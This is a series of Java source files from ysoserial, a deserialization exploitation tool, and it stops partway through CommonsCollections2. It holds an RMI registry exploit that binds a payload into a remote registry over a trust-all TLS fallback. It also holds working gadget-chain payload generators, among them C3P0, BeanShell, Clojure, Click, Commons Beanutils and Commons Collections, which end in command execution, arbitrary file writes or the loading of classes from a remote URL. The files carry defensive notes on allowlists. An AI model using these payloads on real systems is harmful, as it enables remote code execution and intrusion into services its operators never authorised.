FILE: src/main/java/ysoserial/exploit/RMIRegistryExploit.java
================================================
package ysoserial.exploit;

import java.io.IOException;
import java.net.Socket;
import java.rmi.ConnectIOException;
import java.rmi.Remote;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.RMIClientSocketFactory;
import java.security.cert.X509Certificate;
import java.util.concurrent.Callable;
import javax.net.ssl.*;

import ysoserial.payloads.CommonsCollections1;
import ysoserial.payloads.ObjectPayload;
import ysoserial.payloads.ObjectPayload.Utils;
import ysoserial.payloads.util.Gadgets;
import ysoserial.secmgr.ExecCheckingSecurityManager;

/*
 * Utility program for exploiting RMI registries running with required gadgets available in their ClassLoader.
 * Attempts to exploit the registry itself, then enumerates registered endpoints and their interfaces.
 *
 * TODO: automatic exploitation of endpoints, potentially with automated download and use of jars containing remote
 * interfaces. See http://www.findmaven.net/api/find/class/org.springframework.remoting.rmi.RmiInvocationHandler .
 */
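@SuppressWarnings({"rawtypes", "unchecked"})
public class RMIRegistryExploit {
	/**
	 * Trust manager that performs no validation at all: every client and server
	 * certificate chain is accepted and no issuers are advertised. A TLS connection made
	 * with it is encrypted but unauthenticated, so it gives no protection against an
	 * impersonated peer. It exists here only so the fallback connection in main() can
	 * complete a handshake with any registry; it must not be reused where the peer's
	 * identity matters.
	 */
	private static class TrustAllSSL implements X509TrustManager {
		private static final X509Certificate[] ANY_CA = {};
		public X509Certificate[] getAcceptedIssuers() { return ANY_CA; }
		public void checkServerTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }
		public void checkClientTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }
	}

	/**
	 * RMI client socket factory that opens TLS sockets using {@link TrustAllSSL}.
	 * A new SSLContext is built for every socket; any failure is rethrown as IOException.
	 */
	private static class RMISSLClientSocketFactory implements RMIClientSocketFactory {
		public Socket createSocket(String host, int port) throws IOException {
			try {
				SSLContext ctx = SSLContext.getInstance("TLS");
				ctx.init(null, new TrustManager[] {new TrustAllSSL()}, null);
				SSLSocketFactory factory = ctx.getSocketFactory();
				return factory.createSocket(host, port);
			} catch(Exception e) {
				throw new IOException(e);
			}
		}
	}

	/**
	 * Command-line entry point: {@code <host> <port> <payload_type> <payload_arg>}.
	 *
	 * The payload type is resolved as a class name inside the ysoserial.payloads package.
	 * The registry is first contacted in plain text; if that fails with
	 * ConnectIOException the lookup is repeated through the TLS socket factory above.
	 *
	 * Fewer than four arguments now print a usage line and exit, matching the other
	 * entry points in this package, instead of failing with
	 * ArrayIndexOutOfBoundsException.
	 */
	public static void main(final String[] args) throws Exception {
		if (args.length < 4) {
			System.err.println(RMIRegistryExploit.class.getName() + " <host> <port> <payload_type> <payload_arg>");
			System.exit(-1);
		}

		final String host = args[0];
		final int port = Integer.parseInt(args[1]);
		final String command = args[3];
		Registry registry = LocateRegistry.getRegistry(host, port);
		final String className = CommonsCollections1.class.getPackage().getName() +  "." + args[2];
		final Class<? extends ObjectPayload> payloadClass = (Class<? extends ObjectPayload>) Class.forName(className);

		// test RMI registry connection and upgrade to SSL connection on fail
		try {
			registry.list();
		} catch(ConnectIOException ex) {
			registry = LocateRegistry.getRegistry(host, port, new RMISSLClientSocketFactory());
		}

		// ensure payload doesn't detonate during construction or deserialization
		exploit(registry, payloadClass, command);
	}

	/**
	 * Instantiates the payload, wraps it in a map behind a proxy implementing
	 * {@link Remote} and binds that proxy in the registry under a unique name.
	 *
	 * The whole sequence runs inside ExecCheckingSecurityManager.callWrapped, which is
	 * what the "doesn't detonate" remark in main() refers to. A failing bind is printed
	 * and otherwise ignored; the payload is released afterwards.
	 *
	 * @param registry registry stub to bind into
	 * @param payloadClass payload type to instantiate
	 * @param command argument passed to the payload's getObject
	 * @throws Exception whatever callWrapped or payload construction raises
	 */
	public static void exploit(final Registry registry,
			final Class<? extends ObjectPayload> payloadClass,
			final String command) throws Exception {
		new ExecCheckingSecurityManager().callWrapped(new Callable<Void>(){public Void call() throws Exception {
			ObjectPayload payloadObj = payloadClass.newInstance();
			Object payload = payloadObj.getObject(command);
			// nanoTime keeps the binding name unique between runs.
			String name = "pwned" + System.nanoTime();
			Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
			try {
				registry.bind(name, remote);
			} catch (Throwable e) {
				e.printStackTrace();
			}
			Utils.releasePayload(payloadObj, payload);
			return null;
		}});
	}
}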

================================================
FILE: src/main/java/ysoserial/payloads/AspectJWeaver.java
================================================
package ysoserial.payloads;

import org.apache.commons.codec.binary.Base64;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

import java.io.Serializable;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;

/*
Gadget chain:
HashSet.readObject()
    HashMap.put()
        HashMap.hash()
            TiedMapEntry.hashCode()
                TiedMapEntry.getValue()
                    LazyMap.get()
                        SimpleCache$StoreableCachingMap.put()
                            SimpleCache$StoreableCachingMap.writeToPath()
                                FileOutputStream.write()

Usage:
args = "<filename>;<base64 content>"
Example:
java -jar ysoserial.jar AspectJWeaver "ahi.txt;YWhpaGloaQ=="

More information:
https://medium.com/nightst0rm/t%C3%B4i-%C4%91%C3%A3-chi%E1%BA%BFm-quy%E1%BB%81n-%C4%91i%E1%BB%81u-khi%E1%BB%83n-c%E1%BB%A7a-r%E1%BA%A5t-nhi%E1%BB%81u-trang-web-nh%C6%B0-th%E1%BA%BF-n%C3%A0o-61efdf4a03f5
 */
/**
 * Payload generator for a file-write gadget chain: deserializing the returned
 * HashSet reaches AspectJ's SimpleCache$StoreableCachingMap.put() through
 * commons-collections' TiedMapEntry and LazyMap (see the chain in the header
 * comment above). The test annotation marks it "non RCE": the chain ends in a
 * file write, not in command execution.
 *
 * Review/defence notes: the chain only fires where an application deserializes
 * untrusted bytes with both declared libraries on its classpath. A
 * deserialization allowlist (java.io.ObjectInputFilter / the jdk.serialFilter
 * property) that does not admit LazyMap, TiedMapEntry or
 * SimpleCache$StoreableCachingMap stops it before anything is written. None of
 * the commons-collections classes used here is an InvokerTransformer-style
 * functor, which is presumably why the declared dependency can be 3.2.2, so
 * upgrading commons-collections alone should not be assumed to close this
 * path (verify against the deployed version).
 */
@PayloadTest(skip="non RCE")
@SuppressWarnings({"rawtypes", "unchecked"})
@Dependencies({"org.aspectj:aspectjweaver:1.9.2", "commons-collections:commons-collections:3.2.2"})
@Authors({ Authors.JANG })

public class AspectJWeaver implements ObjectPayload<Serializable> {

    /**
     * Builds the serializable trigger object.
     *
     * @param command "&lt;filename&gt;;&lt;base64 content&gt;" (semicolon-separated, as in the usage note above)
     * @return a HashSet whose single backing-map key has been swapped for the TiedMapEntry
     * @throws IllegalArgumentException if the argument contains no ';'
     * @throws Exception on any reflection failure
     */
    public Serializable getObject(final String command) throws Exception {
        int sep = command.lastIndexOf(';');
        if ( sep < 0 ) {
            // NOTE(review): the check above looks for ';' but this message advertises ':' as the separator.
            throw new IllegalArgumentException("Command format is: <filename>:<base64 Object>");
        }
        // NOTE(review): 'sep' is only used for the presence check; the split below cuts at every ';',
        // and parts[1] is read without a length check.
        String[] parts = command.split(";");
        String filename = parts[0];
        byte[] content = Base64.decodeBase64(parts[1]);

        // Instantiate the AspectJ cache map reflectively through its first declared constructor.
        // The arguments are "." and 12; presumably the base folder and a flag value - TODO confirm against AspectJ.
        Constructor ctor = Reflections.getFirstCtor("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap");
        Object simpleCache = ctor.newInstance(".", 12);
        // LazyMap.get(filename) on a missing key asks the transformer for a value (the decoded bytes)
        // and put()s it into the decorated cache map - the put() step shown in the chain header.
        Transformer ct = new ConstantTransformer(content);
        Map lazyMap = LazyMap.decorate((Map)simpleCache, ct);
        TiedMapEntry entry = new TiedMapEntry(lazyMap, filename);
        // Build the HashSet with a harmless placeholder key first; adding 'entry' directly would
        // call entry.hashCode() now and run the chain on the machine that builds the object.
        HashSet map = new HashSet(1);
        map.add("foo");
        // Locate the HashSet's backing HashMap; the second field name is a fallback for class
        // libraries that name it differently.
        Field f = null;
        try {
            f = HashSet.class.getDeclaredField("map");
        } catch (NoSuchFieldException e) {
            f = HashSet.class.getDeclaredField("backingMap");
        }

        Reflections.setAccessible(f);
        HashMap innimpl = (HashMap) f.get(map);

        // Same approach for the HashMap's bucket array.
        Field f2 = null;
        try {
            f2 = HashMap.class.getDeclaredField("table");
        } catch (NoSuchFieldException e) {
            f2 = HashMap.class.getDeclaredField("elementData");
        }

        Reflections.setAccessible(f2);
        Object[] array = (Object[]) f2.get(innimpl);

        // The placeholder entry is expected in bucket 0 or 1; other buckets are not examined.
        Object node = array[0];
        if(node == null){
            node = array[1];
        }

        Field keyField = null;
        try{
            keyField = node.getClass().getDeclaredField("key");
        }catch(Exception e){
            // presumably a fallback for a class library whose entry type is java.util.MapEntry - TODO confirm
            keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
        }

        // Swap the placeholder key for the TiedMapEntry without going through put()/hashCode().
        Reflections.setAccessible(keyField);
        keyField.set(node, entry);

        return map;

    }

    /** Runs the payload through PayloadRunner with a fixed sample argument; any CLI args are overwritten. */
    public static void main(String[] args) throws Exception {
        args = new String[]{"ahi.txt;YWhpaGloaQ=="};
        PayloadRunner.run(AspectJWeaver.class, args);
    }
}


================================================
FILE: src/main/java/ysoserial/payloads/BeanShell1.java
================================================
package ysoserial.payloads;

import bsh.Interpreter;
import bsh.XThis;

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.Arrays;
import java.util.Comparator;
import java.util.PriorityQueue;

import ysoserial.Strings;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.util.Reflections;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.PayloadRunner;

/**
 * Payload generator for a BeanShell-based chain: a PriorityQueue whose
 * Comparator is a java.lang.reflect.Proxy backed by a BeanShell XThis
 * invocation handler, so that Comparator.compare() is answered by a scripted
 * BeanShell function.
 *
 * Credits: Alvaro Munoz (@pwntester) and Christian Schneider (@cschneider4711)
 *
 * Review/defence notes: the chain needs the declared bsh artifact on the
 * classpath of a service that deserializes untrusted data. A deserialization
 * allowlist (java.io.ObjectInputFilter / jdk.serialFilter) that does not admit
 * bsh.* classes stops it, and a JVM that unexpectedly spawns child processes
 * is the runtime symptom to alert on.
 */

@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({ "org.beanshell:bsh:2.0b5" })
@Authors({Authors.PWNTESTER, Authors.CSCHNEIDER4711})
public class BeanShell1 extends PayloadRunner implements ObjectPayload<PriorityQueue> {

    /**
     * Builds the serializable trigger object.
     *
     * @param command command line; it is split on single spaces into ProcessBuilder arguments
     * @return a PriorityQueue holding two placeholder elements and the scripted comparator
     * @throws Exception if the BeanShell source fails to evaluate or reflection fails
     */
    public PriorityQueue getObject(String command) throws Exception {
	// BeanShell payload
	// Source of a BeanShell function named compare(), matching Comparator.compare(Object, Object).
	// Each space-separated token of the command becomes one quoted element of the String[] literal.

        String payload =
            "compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{" +
                Strings.join( // does not support spaces in quotes
                    Arrays.asList(command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"","\\\"").split(" ")),
                    ",", "\"", "\"") +
                "}).start();return new Integer(1);}";

	// Create Interpreter
	Interpreter i = new Interpreter();

	// Evaluate payload
	// This only defines compare() in the interpreter's namespace; nothing is started here.
	i.eval(payload);

	// Create InvocationHandler
	// XThis keeps its handler in the field "invocationHandler"; it is read reflectively.
	XThis xt = new XThis(i.getNameSpace(), i);
	InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt);

	// Create Comparator Proxy
	Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);

	// Prepare Trigger Gadget (will call Comparator.compare() during deserialization)
	// The elements and size are written by reflection instead of add(), so the comparator
	// is not invoked while the object is being built.
	final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
	Object[] queue = new Object[] {1,1};
	Reflections.setFieldValue(priorityQueue, "queue", queue);
	Reflections.setFieldValue(priorityQueue, "size", 2);

	return priorityQueue;
    }

    /** Command-line entry point; delegates to PayloadRunner. */
    public static void main(final String[] args) throws Exception {
	PayloadRunner.run(BeanShell1.class, args);
    }
}


================================================
FILE: src/main/java/ysoserial/payloads/C3P0.java
================================================
package ysoserial.payloads;


import java.io.PrintWriter;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;

import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;

import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;


/**
 * Payload generator for the c3p0 remote-class-loading chain.
 *
 * Calls involved on the deserializing side:
 *
 * com.sun.jndi.rmi.registry.RegistryContext->lookup
 * com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized->getObject
 * com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase->readObject
 *
 * Arguments:
 * - base_url:classname
 *
 * Yields:
 * - Instantiation of remotely loaded class
 *
 * Review/defence notes: the deserializing JVM has to fetch the named class
 * from base_url, so denying outbound connections from application servers and
 * applying a deserialization allowlist (java.io.ObjectInputFilter /
 * jdk.serialFilter) that does not admit the com.mchange.* classes above both
 * interrupt the chain. Unexpected outbound class fetches from a JVM are the
 * network-side symptom.
 *
 * @author mbechler
 *
 */
@PayloadTest ( harness="ysoserial.test.payloads.RemoteClassLoadingTest" )
@Dependencies( { "com.mchange:c3p0:0.9.5.2" ,"com.mchange:mchange-commons-java:0.2.11"} )
@Authors({ Authors.MBECHLER })
public class C3P0 implements ObjectPayload<Object> {

    /**
     * Builds the serializable trigger object.
     *
     * @param command "&lt;base_url&gt;:&lt;classname&gt;"; the split is made at the LAST colon so the
     *                URL part may itself contain colons
     * @return a PoolBackedDataSource whose connectionPoolDataSource field holds a PoolSource
     * @throws IllegalArgumentException if the argument contains no ':'
     * @throws Exception on any reflection failure
     */
    public Object getObject ( String command ) throws Exception {
        final int lastColon = command.lastIndexOf(':');
        if ( lastColon < 0 ) {
            throw new IllegalArgumentException("Command format is: <base_url>:<classname>");
        }

        final String baseUrl = command.substring(0, lastColon);
        final String factoryClass = command.substring(lastColon + 1);

        // The data source is allocated without running a constructor, then its
        // connectionPoolDataSource field (declared on the base class) is set reflectively.
        final PoolBackedDataSource dataSource = Reflections.createWithoutConstructor(PoolBackedDataSource.class);
        Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource")
            .set(dataSource, new PoolSource(factoryClass, baseUrl));
        return dataSource;
    }


    /**
     * Stub ConnectionPoolDataSource that is also Referenceable. Only getReference() carries
     * data; every other method is an empty implementation required by the interfaces.
     */
    private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {

        private String className;
        private String url;

        public PoolSource ( String className, String url ) {
            this.className = className;
            this.url = url;
        }

        /**
         * Returns a javax.naming.Reference whose factory class name is className and whose
         * factory location is url; "exploit" is only the nominal class name of the referenced object.
         */
        public Reference getReference () throws NamingException {
            final Reference ref = new Reference("exploit", this.className, this.url);
            return ref;
        }

        public PrintWriter getLogWriter () throws SQLException {
            return null;
        }

        public void setLogWriter ( PrintWriter out ) throws SQLException {
        }

        public void setLoginTimeout ( int seconds ) throws SQLException {
        }

        public int getLoginTimeout () throws SQLException {
            return 0;
        }

        public Logger getParentLogger () throws SQLFeatureNotSupportedException {
            return null;
        }

        public PooledConnection getPooledConnection () throws SQLException {
            return null;
        }

        public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {
            return null;
        }

    }


    /** Command-line entry point; delegates to PayloadRunner. */
    public static void main ( final String[] args ) throws Exception {
        PayloadRunner.run(C3P0.class, args);
    }

}


================================================
FILE: src/main/java/ysoserial/payloads/Click1.java
================================================
package ysoserial.payloads;

import org.apache.click.control.Column;
import org.apache.click.control.Table;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

import java.math.BigInteger;
import java.util.Comparator;
import java.util.PriorityQueue;

/*
    Apache Click chain based on arbitrary getter calls in PropertyUtils.getObjectPropertyValue().
    We use java.util.PriorityQueue to trigger ColumnComparator.compare().
    After that, ColumnComparator.compare() leads to TemplatesImpl.getOutputProperties() via unsafe reflection.

    Chain:

    java.util.PriorityQueue.readObject()
      java.util.PriorityQueue.heapify()
        java.util.PriorityQueue.siftDown()
          java.util.PriorityQueue.siftDownUsingComparator()
            org.apache.click.control.Column$ColumnComparator.compare()
              org.apache.click.control.Column.getProperty()
                org.apache.click.control.Column.getProperty()
                  org.apache.click.util.PropertyUtils.getValue()
                    org.apache.click.util.PropertyUtils.getObjectPropertyValue()
                      java.lang.reflect.Method.invoke()
                        com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.getOutputProperties()
                        ...

    Arguments:
    - command to execute

    Yields:
    - RCE via TemplatesImpl.getOutputProperties()

    Requires:
    - Apache Click
    - servlet-api of any version

    by @artsploit
*/
/**
 * Payload generator for the Apache Click chain described in the header comment:
 * a PriorityQueue ordered by Column$ColumnComparator, which reads a named bean
 * property from each element through reflection.
 *
 * Review/defence notes: the comparator calls whichever getter the Column's name
 * selects, on whatever object sits in the queue, which is why a serialized
 * queue can steer it to TemplatesImpl.getOutputProperties(). A deserialization
 * allowlist (java.io.ObjectInputFilter / jdk.serialFilter) that does not admit
 * org.apache.click.* or the internal TemplatesImpl class stops the chain.
 */
@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({"org.apache.click:click-nodeps:2.3.0", "javax.servlet:javax.servlet-api:3.1.0"})
@Authors({ Authors.ARTSPLOIT })
public class Click1 implements ObjectPayload<Object> {

    /**
     * Builds the serializable trigger object.
     *
     * @param command command string handed to Gadgets.createTemplatesImpl()
     * @return a two-element PriorityQueue whose first slot holds the templates object
     * @throws Exception on any reflection failure
     */
    public Object getObject(final String command) throws Exception {

        // prepare a Column.comparator with mock values
        // "lowestSetBit" is a real BigInteger getter, so comparing the stub elements below is harmless
        final Column column = new Column("lowestSetBit");
        column.setTable(new Table());
        Comparator comparator = (Comparator) Reflections.newInstance("org.apache.click.control.Column$ColumnComparator", column);

        // create queue with numbers and our comparator
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        // stub data for replacement later
        // (add() invokes the comparator, so the real object must not be in the queue yet)
        queue.add(new BigInteger("1"));
        queue.add(new BigInteger("1"));

        // switch method called by the comparator,
        // so it will trigger getOutputProperties() when objects in the queue are compared
        column.setName("outputProperties");

        // finally, we inject a new TemplatesImpl object into the queue,
        // so its getOutputProperties() method will be called
        // (written straight into the backing array, so no comparison happens at build time)
        final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
        final Object templates = Gadgets.createTemplatesImpl(command);
        queueArray[0] = templates;

        return queue;
    }

    /** Command-line entry point; delegates to PayloadRunner. */
    public static void main(final String[] args) throws Exception {
        PayloadRunner.run(Click1.class, args);
    }
}


================================================
FILE: src/main/java/ysoserial/payloads/Clojure.java
================================================
package ysoserial.payloads;

import clojure.inspector.proxy$javax.swing.table.AbstractTableModel$ff19274a;
import clojure.lang.PersistentArrayMap;
import ysoserial.Strings;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.PayloadRunner;

import java.util.Arrays;
import java.util.HashMap;
import java.util.Map;

/*
	Gadget chain:
		ObjectInputStream.readObject()
			HashMap.readObject()
				AbstractTableModel$ff19274a.hashCode()
					clojure.core$comp$fn__4727.invoke()
						clojure.core$constantly$fn__4614.invoke()
						clojure.main$eval_opt.invoke()

	Requires:
		org.clojure:clojure
		Versions since 1.2.0 are vulnerable, although some class names may need to be changed for other versions
 */
/**
 * Payload generator for the Clojure chain in the header comment: a HashMap
 * whose key is a Clojure-generated AbstractTableModel proxy. The proxy resolves
 * hashCode() through a function map, and that map is pointed at a composed
 * function that evaluates a Clojure form.
 *
 * Review/defence notes: HashMap.readObject() re-hashes its keys, so the proxy's
 * hashCode() mapping runs during deserialization. A deserialization allowlist
 * (java.io.ObjectInputFilter / jdk.serialFilter) that does not admit clojure.*
 * classes stops the chain; the header comment notes that class names differ
 * between Clojure versions, so filter on the package rather than on the exact
 * generated names.
 */
@Dependencies({"org.clojure:clojure:1.8.0"})
@Authors({ Authors.JACKOFMOSTTRADES })
public class Clojure extends PayloadRunner implements ObjectPayload<Map<?, ?>> {

	/**
	 * Builds the serializable trigger object.
	 *
	 * @param command command line; it is split on single spaces into quoted arguments of (sh ...)
	 * @return a HashMap with the proxy as its only key
	 * @throws Exception if constructing the Clojure objects fails
	 */
	public Map<?, ?> getObject(final String command) throws Exception {

		// Earlier argument-quoting implementation, kept by the author for reference:
//		final String[] execArgs = command.split(" ");
//		final StringBuilder commandArgs = new StringBuilder();
//		for (String arg : execArgs) {
//			commandArgs.append("\" \"");
//			commandArgs.append(arg);
//		}
//		commandArgs.append("\"");


//		final String clojurePayload =
//				String.format("(use '[clojure.java.shell :only [sh]]) (sh %s)", commandArgs.substring(2));

        // Backslashes are doubled, double quotes are rewritten, and each space-separated
        // token is wrapped in double quotes and joined with single spaces.
        // NOTE(review): confirm the quote handling; the second replaceAll's replacement is a lone backslash.
        String cmd = Strings.join(Arrays.asList(command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"","\\").split(" ")), " ", "\"", "\"");

        final String clojurePayload =
            String.format("(use '[clojure.java.shell :only [sh]]) (sh %s)", cmd);



        // Setup phase: hashCode is mapped to a constant function, so inserting the proxy
        // into the HashMap below evaluates nothing.
        Map<String, Object> fnMap = new HashMap<String, Object>();
		fnMap.put("hashCode", new clojure.core$constantly().invoke(0));

		AbstractTableModel$ff19274a model = new AbstractTableModel$ff19274a();
		model.__initClojureFnMappings(PersistentArrayMap.create(fnMap));

		HashMap<Object, Object> targetMap = new HashMap<Object, Object>();
		targetMap.put(model, null);

		// Arming phase: hashCode now maps to comp(eval_opt, constantly(payload)), i.e. the
		// payload string is produced and then passed to clojure.main's eval_opt.
		fnMap.put("hashCode",
				new clojure.core$comp().invoke(
						new clojure.main$eval_opt(),
						new clojure.core$constantly().invoke(clojurePayload)));
		model.__initClojureFnMappings(PersistentArrayMap.create(fnMap));

		return targetMap;
	}

	/** Command-line entry point; delegates to PayloadRunner. */
	public static void main(final String[] args) throws Exception {
		PayloadRunner.run(Clojure.class, args);
	}

}


================================================
FILE: src/main/java/ysoserial/payloads/CommonsBeanutils1.java
================================================
package ysoserial.payloads;

import java.math.BigInteger;
import java.util.PriorityQueue;

import org.apache.commons.beanutils.BeanComparator;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

/**
 * Payload generator for a commons-beanutils chain: a PriorityQueue ordered by a
 * BeanComparator, which compares elements by reading a named bean property
 * from each of them.
 *
 * Review/defence notes: PriorityQueue re-orders its elements on
 * deserialization, so the comparator's property getter runs on attacker-chosen
 * objects. A deserialization allowlist (java.io.ObjectInputFilter /
 * jdk.serialFilter) that does not admit BeanComparator or the internal
 * TemplatesImpl class stops the chain.
 */
@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"})
@Authors({ Authors.FROHOFF })
public class CommonsBeanutils1 implements ObjectPayload<Object> {

	/**
	 * Builds the serializable trigger object.
	 *
	 * @param command command string handed to Gadgets.createTemplatesImpl()
	 * @return a two-element PriorityQueue with both slots holding the templates object
	 * @throws Exception on any reflection failure
	 */
	public Object getObject(final String command) throws Exception {
		final Object templates = Gadgets.createTemplatesImpl(command);
		// mock method name until armed
		// ("lowestSetBit" is a real BigInteger getter, so the stub comparisons below are harmless)
		final BeanComparator comparator = new BeanComparator("lowestSetBit");

		// create queue with numbers and basic comparator
		final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
		// stub data for replacement later
		// (add() invokes the comparator, so the real objects must not be in the queue yet)
		queue.add(new BigInteger("1"));
		queue.add(new BigInteger("1"));

		// switch method called by comparator
		// (after this the comparator reads the "outputProperties" property, i.e. getOutputProperties())
		Reflections.setFieldValue(comparator, "property", "outputProperties");

		// switch contents of queue
		// (written straight into the backing array, so no comparison happens at build time)
		final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
		queueArray[0] = templates;
		queueArray[1] = templates;

		return queue;
	}

	/** Command-line entry point; delegates to PayloadRunner. */
	public static void main(final String[] args) throws Exception {
		PayloadRunner.run(CommonsBeanutils1.class, args);
	}
}


================================================
FILE: src/main/java/ysoserial/payloads/CommonsCollections1.java
================================================
package ysoserial.payloads;

import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.Map;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

/*
	Gadget chain:
		ObjectInputStream.readObject()
			AnnotationInvocationHandler.readObject()
				Map(Proxy).entrySet()
					AnnotationInvocationHandler.invoke()
						LazyMap.get()
							ChainedTransformer.transform()
								ConstantTransformer.transform()
								InvokerTransformer.transform()
									Method.invoke()
										Class.getMethod()
								InvokerTransformer.transform()
									Method.invoke()
										Runtime.getRuntime()
								InvokerTransformer.transform()
									Method.invoke()
										Runtime.exec()

	Requires:
		commons-collections
 */
/**
 * Payload generator for the commons-collections 3.x chain in the header
 * comment: a LazyMap decorated with a ChainedTransformer, reached through a
 * Map proxy and an invocation handler built by the Gadgets helpers.
 *
 * Review/defence notes: the transformer list reflectively resolves
 * Runtime.getRuntime() and calls exec(String), so the runtime symptom is a JVM
 * spawning a child process. Later commons-collections releases refuse to
 * deserialize the unsafe functor classes such as InvokerTransformer by
 * default; a deserialization allowlist (java.io.ObjectInputFilter /
 * jdk.serialFilter) covers the case where the library cannot be upgraded. The
 * payload is also gated on a JDK-version precondition, see
 * isApplicableJavaVersion().
 */
@SuppressWarnings({"rawtypes", "unchecked"})
@PayloadTest ( precondition = "isApplicableJavaVersion")
@Dependencies({"commons-collections:commons-collections:3.1"})
@Authors({ Authors.FROHOFF })
public class CommonsCollections1 extends PayloadRunner implements ObjectPayload<InvocationHandler> {

	/**
	 * Builds the serializable trigger object.
	 *
	 * @param command command string, passed as the single argument of Runtime.exec(String)
	 * @return the invocation handler wrapping the Map proxy
	 * @throws Exception on any reflection failure
	 */
	public InvocationHandler getObject(final String command) throws Exception {
		final String[] execArgs = new String[] { command };
		// inert chain for setup
		// (the helpers below may touch the map; with only a ConstantTransformer nothing runs locally)
		final Transformer transformerChain = new ChainedTransformer(
			new Transformer[]{ new ConstantTransformer(1) });
		// real chain for after setup
		// Runtime.class -> getMethod("getRuntime") -> invoke(null) -> exec(command) -> constant 1
		final Transformer[] transformers = new Transformer[] {
				new ConstantTransformer(Runtime.class),
				new InvokerTransformer("getMethod", new Class[] {
					String.class, Class[].class }, new Object[] {
					"getRuntime", new Class[0] }),
				new InvokerTransformer("invoke", new Class[] {
					Object.class, Object[].class }, new Object[] {
					null, new Object[0] }),
				new InvokerTransformer("exec",
					new Class[] { String.class }, execArgs),
				new ConstantTransformer(1) };

		final Map innerMap = new HashMap();

		// LazyMap.get() on a missing key calls the transformer to produce a value
		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

		// presumably a java.lang.reflect.Proxy for Map backed by AnnotationInvocationHandler,
		// per the chain in the header comment - see Gadgets for the actual construction
		final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);

		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);

		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

		return handler;
	}

	/** Command-line entry point; delegates to PayloadRunner. */
	public static void main(final String[] args) throws Exception {
		PayloadRunner.run(CommonsCollections1.class, args);
	}

	/** Precondition named by the PayloadTest annotation; delegates to JavaVersion.isAnnInvHUniversalMethodImpl(). */
	public static boolean isApplicableJavaVersion() {
        return JavaVersion.isAnnInvHUniversalMethodImpl();
    }
}


================================================
FILE: src/main/java/ysoserial/payloads/CommonsCollections2.java
================================================
package ysoserial.payloads;

import java.util.PriorityQueue;
import java.util.Queue;

import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
